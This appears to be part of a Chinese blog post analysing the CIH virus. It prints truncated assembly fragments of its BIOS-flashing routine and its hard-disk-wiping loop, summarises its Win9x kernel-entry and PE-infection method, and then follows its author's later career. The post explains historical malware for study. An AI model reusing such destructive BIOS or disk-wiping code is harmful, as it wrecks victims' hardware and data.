在IsKillComputer可以看到CIH设计了一个潜伏策略,先感染,然后并不发作,以增加感染的机会,直到当前日期是26日时大家统一发作。 当时间悄然的来到26号时,CIH开始破坏BIOS和硬盘。 破坏BIOS的方法为: 1.将BIOS的内容映射到内存,然后设置BIOS可写。主要调用了IOForEEPROM和EnableEEPROMToWrite。 IOForEEPROM: @10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret 从上面的代码可以看到,CIH使用in,和out指令进行BIOS数据的修改。 而破坏硬盘的方法是利用了我们之前提到的VXD调用IOS_SendCommand。 KillHardDisk: ...... push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand ...... jmp LoopOfKillHardDisk 总结 最后,我们来梳理一下: 病毒得到执行后会修改IDT,进入内核。这应该算是Win9X系统的一个漏洞,在WinNT及以后的系统这种进入内核的方法已经失效。 进入内核的主要目的安装系统钩子,钩住文件读写调用,钩住系统调用后退出Ring0; 当有文件读写调用且文件是PE文件时,将病毒感染到PE文件中。 潜伏下来,直到每月的26日统一发作,开始破坏BIOS和硬盘数据。 后续1 由于新竹和台北的科技企业离故乡太远,陈盈豪毕业后选择了一家做 Linux 系统的公司工作,因为「骑车只要 10 分钟」。后来又到集嘉通訊为系统排除疑难杂症,还开发出了一套自己独有的分析程序(被他称为「善良病毒」)测试手机系统。 2012 年,休假的陈盈豪选择徒步环台湾岛一周。55 天、1200 公里,每天 10 小时的步行,在路途上思考「为什么而活」。旅途上积累的回忆却没有产品梳理,休息了一年后的 2013 年 7 月,陈盈豪正式开始了自己的创业项目 8tory。8tory 是一款基于照片 GPS 信息的照片分享应用,当你拍完照片就能看到照片的地点、地图,还可以向他人展示你的经历。主打「回忆」的这款安卓客户端应用。 在知乎「那些曾经大名鼎鼎的黑客现在都在干什么?」这个问题下(没错他已经注册了知乎),陈盈豪写下了创业的艰难,需要面对用户、面对投资人、需要资金,「一直被用戶狠狠的教訓」,但并不会放弃。 (2015年)7 月陈盈豪将会来到北京,参加乌云白帽子大会。 https://www.geekpark.net/news/212936 ↩ ↩2 https://www.anquanke.com/post/id/164959 ↩ ↩2
  • 网页嵌入QQ联系方式 该功能基于QQ推广,目前可以直接访问这里,登陆用作联系方式的QQ号,直接复制HTML代码就可以啦。
  • 网络视频获取 犹记得当初视频获取之便利。今日互联网,能看到视频但不能下载。 提供视频解析服务的网站/软件
  • 信息安全名人 2010新编中国顶级安全圈内人物12 https://www.cnblogs.com/milantgh/p/3853932.html ↩ 本文作者milantgh为《Web安全漏洞原理及实战》作者。网络安全专家,信息安全顾问 ↩
  • 网站收藏 善用佳软